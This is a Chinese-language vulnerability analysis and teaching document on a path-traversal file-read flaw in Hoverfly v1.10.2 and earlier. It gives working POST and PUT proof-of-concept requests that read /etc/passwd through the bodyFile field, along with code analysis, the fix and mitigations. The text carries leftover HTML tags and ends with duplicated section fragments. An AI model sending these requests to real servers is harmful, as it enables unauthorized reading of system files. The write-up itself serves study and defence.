Hoverfly 任意文件读取漏洞分析与教学文档<\/h1>

漏洞概述<\/h2>
Hoverfly 是一个为开发人员和测试人员提供的轻量级服务虚拟化\/API模拟工具。在 v1.10.2 及之前版本中，存在一个任意文件读取漏洞，攻击者可以通过构造特定请求读取服务器上的任意文件。<\/p>

漏洞细节<\/h2>

漏洞位置<\/h3>
漏洞存在于 `\/api\/v2\/simulation<\/code> 接口的 POST 和 PUT 请求处理中，特别是对 bodyFile<\/code> 参数的处理。<\/p>`

漏洞成因<\/h3>

系统允许用户通过 bodyFile<\/code> 参数指定文件路径来创建模拟视图<\/li>
虽然代码禁止使用绝对路径（通过 filepath.IsAbs<\/code> 检查）<\/li>
但未对路径中的 ..\/<\/code> 进行过滤，导致目录穿越攻击<\/li>
最终通过 filepath.Join(hf.Cfg.ResponsesBodyFilesPath, filePath)<\/code> 拼接路径时，攻击者可逃离基本路径限制<\/li>
<\/ol>
影响版本<\/h3>
Hoverfly v1.10.2 及之前版本<\/p>
环境搭建<\/h2>
使用 Docker 快速搭建漏洞环境：<\/p>
docker pull spectolabs\/hoverfly:v1.10.2
<\/span><\/span>docker run -d -p 8888:8888 -p 8500:8500 spectolabs\/hoverfly:v1.10.2
<\/span><\/span><\/code><\/pre>验证环境是否成功搭建：访问 http:\/\/localhost:8888<\/code><\/p>
漏洞复现<\/h2>
方法一：POST 请求<\/h3>
POST<\/span> \/api\/v2\/simulation HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 192.168.177.146:8888<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json<\/span>
<\/span><\/span>
<\/span><\/span>{
<\/span><\/span>  "data"<\/span>: {
<\/span><\/span>    "pairs"<\/span>: [
<\/span><\/span>      {
<\/span><\/span>        "request"<\/span>: {},
<\/span><\/span>        "response"<\/span>: {
<\/span><\/span>          "bodyFile"<\/span>: "..\/..\/..\/..\/etc\/passwd"<\/span>
<\/span><\/span>        }
<\/span><\/span>      }
<\/span><\/span>    ]
<\/span><\/span>  },
<\/span><\/span>  "meta"<\/span>: {
<\/span><\/span>    "schemaVersion"<\/span>: "v5.2"<\/span>
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>限制<\/strong>：只能读取一次，后续请求会因"simulation already exists"错误而失败<\/p>
方法二：PUT 请求（更优）<\/h3>
PUT<\/span> \/api\/v2\/simulation HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 192.168.177.146:8888<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json<\/span>
<\/span><\/span>
<\/span><\/span>{
<\/span><\/span>  "data"<\/span>: {
<\/span><\/span>    "pairs"<\/span>: [
<\/span><\/span>      {
<\/span><\/span>        "request"<\/span>: {},
<\/span><\/span>        "response"<\/span>: {
<\/span><\/span>          "bodyFile"<\/span>: "..\/..\/..\/..\/etc\/passwd"<\/span>
<\/span><\/span>        }
<\/span><\/span>      }
<\/span><\/span>    ]
<\/span><\/span>  },
<\/span><\/span>  "meta"<\/span>: {
<\/span><\/span>    "schemaVersion"<\/span>: "v5.2"<\/span>
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>优势<\/strong>：可以多次使用，因为 PUT 方法会覆盖现有模拟数据<\/p>
代码分析<\/h2>
请求路由处理<\/h3>
simulation_handler.go<\/code> 中定义了各种请求方法的路由：<\/p>
func<\/span> (this<\/span> *<\/span>SimulationHandler<\/span>) RegisterRoutes<\/span>(mux<\/span> *<\/span>bone<\/span>.Mux<\/span>, am<\/span> *<\/span>handlers<\/span>.AuthHandler<\/span>) {
<\/span><\/span>    mux<\/span>.Get<\/span>("\/api\/v2\/simulation"<\/span>, ...<\/span>)
<\/span><\/span>    mux<\/span>.Put<\/span>("\/api\/v2\/simulation"<\/span>, ...<\/span>)  \/\/ 使用Put方法处理
<\/span><\/span><\/span><\/span>    mux<\/span>.Post<\/span>("\/api\/v2\/simulation"<\/span>, ...<\/span>) \/\/ 使用Post方法处理
<\/span><\/span><\/span><\/span>    mux<\/span>.Delete<\/span>("\/api\/v2\/simulation"<\/span>, ...<\/span>)
<\/span><\/span>    mux<\/span>.Options<\/span>("\/api\/v2\/simulation"<\/span>, ...<\/span>)
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>PUT 方法处理流程<\/h3>

Put<\/code> 方法调用 addSimulation<\/code> 并设置 overrideExisting<\/code> 为 true<\/li>
调用 putOrReplaceSimulation<\/code> 方法<\/li>
调用 readResponseBodyFiles<\/code> 读取文件内容<\/li>
调用 readResponseBodyFile<\/code> 实际读取文件<\/li>
<\/ol>
漏洞关键代码<\/h3>
readResponseBodyFile<\/code> 函数：<\/p>
func<\/span> (hf<\/span> *<\/span>Hoverfly<\/span>) readResponseBodyFile<\/span>(filePath<\/span> string<\/span>) (string<\/span>, error<\/span>) {
<\/span><\/span>    if<\/span> filepath<\/span>.IsAbs<\/span>(filePath<\/span>) {  \/\/ 仅检查绝对路径
<\/span><\/span><\/span><\/span>        return<\/span> ""<\/span>, fmt<\/span>.Errorf<\/span>("bodyFile contains absolute path (%s). only relative is supported"<\/span>, filePath<\/span>)
<\/span><\/span>    }
<\/span><\/span>    \/\/ 未检查..\/等路径穿越字符
<\/span><\/span><\/span><\/span>    fileContents<\/span>, err<\/span> :=<\/span> ioutil<\/span>.ReadFile<\/span>(filepath<\/span>.Join<\/span>(hf<\/span>.Cfg<\/span>.ResponsesBodyFilesPath<\/span>, filePath<\/span>))
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        return<\/span> ""<\/span>, err<\/span>
<\/span><\/span>    }
<\/span><\/span>    return<\/span> string(fileContents<\/span>[:]), nil<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞修复<\/h2>
修复方法是在路径拼接前增加了 ResolveAndValidatePath<\/code> 方法，对路径进行解析和验证，防止目录穿越攻击。<\/p>
安全建议<\/h2>

升级到最新版本 Hoverfly<\/li>
如果无法立即升级，可实施以下缓解措施：

在反向代理层过滤包含 ..\/<\/code> 的请求<\/li>
限制 Hoverfly 服务运行在低权限用户下<\/li>
使用容器隔离运行环境<\/li>
<\/ul>
<\/li>
对所有用户提供的文件路径进行规范化处理<\/li>
实施路径白名单验证机制<\/li>
<\/ol>
总结<\/h2>
该漏洞展示了即使有基本路径限制，如果不对路径穿越字符进行过滤，仍然可能导致严重的安全问题。开发人员在处理文件路径时应当：<\/p>

规范化路径<\/li>
验证路径是否在预期范围内<\/li>
考虑使用安全的文件访问API<\/li>
实施深度防御策略<\/li>
<\/ol>

Hoverfly 任意文件读取漏洞分析与教学文档<\/h1>

漏洞概述<\/h2> Hoverfly 是一个为开发人员和测试人员提供的轻量级服务虚拟化\/API模拟工具。在 v1.10.2 及之前版本中，存在一个任意文件读取漏洞，攻击者可以通过构造特定请求读取服务器上的任意文件。<\/p>

漏洞细节<\/h2>

漏洞位置<\/h3> 漏洞存在于 \/api\/v2\/simulation<\/code> 接口的 POST 和 PUT 请求处理中，特别是对 bodyFile<\/code> 参数的处理。<\/p>

影响版本<\/h3> Hoverfly v1.10.2 及之前版本<\/p>

漏洞修复<\/h2> 修复方法是在路径拼接前增加了 ResolveAndValidatePath<\/code> 方法，对路径进行解析和验证，防止目录穿越攻击。<\/p>

漏洞概述<\/h2>
Hoverfly 是一个为开发人员和测试人员提供的轻量级服务虚拟化\/API模拟工具。在 v1.10.2 及之前版本中，存在一个任意文件读取漏洞，攻击者可以通过构造特定请求读取服务器上的任意文件。<\/p>

漏洞位置<\/h3>
漏洞存在于 `\/api\/v2\/simulation<\/code> 接口的 POST 和 PUT 请求处理中，特别是对 bodyFile<\/code> 参数的处理。<\/p>`

影响版本<\/h3>
Hoverfly v1.10.2 及之前版本<\/p>

漏洞修复<\/h2>
修复方法是在路径拼接前增加了 `ResolveAndValidatePath<\/code> 方法，对路径进行解析和验证，防止目录穿越攻击。<\/p>`